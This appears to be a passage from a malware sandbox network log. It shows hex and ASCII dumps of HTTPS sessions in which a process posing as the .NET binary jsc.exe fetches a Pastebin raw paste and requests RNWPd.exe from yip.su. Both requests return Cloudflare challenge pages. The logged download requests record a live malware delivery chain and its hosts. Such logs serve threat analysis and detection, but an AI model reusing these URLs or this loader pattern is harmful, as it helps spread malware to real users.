                                    2024-08-17 22:11:57 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:11:57 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:11:57 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:11:57 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:11:57 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 36 31 36 35 33 27 2c 63 52 61 79 3a 20 27 38 62 34 64 30 30 62 63 66 65 63 32 34 33 63 31 27 2c 63 48 61 73 68 3a 20 27 61 61 35 64 62 31 65 35 65 33 61 66 66 35 37 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 63 4e 5a 45 44 4e 52 32 36 58 6d 33 55 67 49 48 52 46 42 41 63 65 35 30 79 4e 76 6c 65 32 4b 42 41 38 36 6a 70 47 58 71 66 48 6f 2d 31 37 32 33 39 33 32 37 31 37 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '61653',cRay: '8b4d00bcfec243c1',cHash: 'aa5db1e5e3aff57',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=cNZEDNR26Xm3UgIHRFBAce50yNvle2KBA86jpGXqfHo-1723932717-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:11:57 UTC1369INData Raw: 70 43 44 53 54 76 2e 66 6b 39 61 49 5f 4b 33 6d 6a 6c 54 31 2e 57 59 71 48 6a 6b 4a 64 4b 6f 6e 52 6d 2e 66 72 45 54 6a 6d 66 37 41 6e 75 51 38 61 45 45 4c 71 62 37 63 5a 57 76 68 49 31 36 7a 41 42 6d 55 66 73 74 69 42 72 53 64 56 57 6c 49 4c 64 65 71 77 43 36 47 2e 65 59 5f 46 69 44 4d 55 6a 48 32 73 48 75 6b 4a 46 76 66 75 37 4c 74 44 61 45 75 52 39 35 65 32 34 69 53 42 69 56 52 42 64 73 4a 64 37 44 5a 36 4d 58 64 4f 75 54 74 59 58 70 44 6b 6d 36 48 43 68 38 55 46 6c 59 6c 4c 44 47 70 56 75 34 54 45 67 45 41 70 58 51 72 62 36 50 4e 77 4a 33 43 39 6d 2e 4d 4b 58 73 4d 32 78 4e 6d 65 58 7a 46 6d 67 39 33 36 51 61 4c 31 4f 77 56 61 31 62 55 6b 47 75 58 69 47 6a 31 4e 4c 57 71 4c 66 78 4e 4c 67 6e 38 53 65 65 39 51 36 2e 66 4d 55 69 53 43 4c 55 4d 36 6e 49
                                    Data Ascii: pCDSTv.fk9aI_K3mjlT1.WYqHjkJdKonRm.frETjmf7AnuQ8aEELqb7cZWvhI16zABmUfstiBrSdVWlILdeqwC6G.eY_FiDMUjH2sHukJFvfu7LtDaEuR95e24iSBiVRBdsJd7DZ6MXdOuTtYXpDkm6HCh8UFlYlLDGpVu4TEgEApXQrb6PNwJ3C9m.MKXsM2xNmeXzFmg936QaL1OwVa1bUkGuXiGj1NLWqLfxNLgn8See9Q6.fMUiSCLUM6nI


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    81192.168.2.549809104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:12:03 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:12:03 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:12:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4d00df382b4271-EWR
                                    2024-08-17 22:12:03 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:12:03 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:12:03 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:12:03 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:12:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    82192.168.2.549810188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:12:03 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:12:03 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:12:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:12:03 UTC691INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 31 34 67 48 72 72 71 6f 78 37 64 4a 79 52 63 76 39 6d 65 55 36 44 65 45 33 53 56 34 74 44 4a 50 4d 57 39 69 6e 41 44 6c 38 30 68 2f 39 30 72 38 5a 4e 71 70 51 4b 6d 56 6c 55 76 71 47 42 44 44 46 73 4b 48 72 65 67 48 4a 54 54 6e 73 59 51 58 61 39 50 4b 6f 66 4b 75 55 50 4b 48 34 74 76 41 6d 72 54 44 6b 33 61 63 6c 43 73 3d 24 42 41 6e 78 66 55 57 36 4c 4a 2f 61 39 6e 2b 38 6c 31 78 41 69 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: 14gHrrqox7dJyRcv9meU6DeE3SV4tDJPMW9inADl80h/90r8ZNqpQKmVlUvqGBDDFsKHregHJTTnsYQXa9PKofKuUPKH4tvAmrTDk3aclCs=$BAnxfUW6LJ/a9n+8l1xAiA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:12:03 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:12:03 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:12:03 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:12:03 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:12:03 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:12:03 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
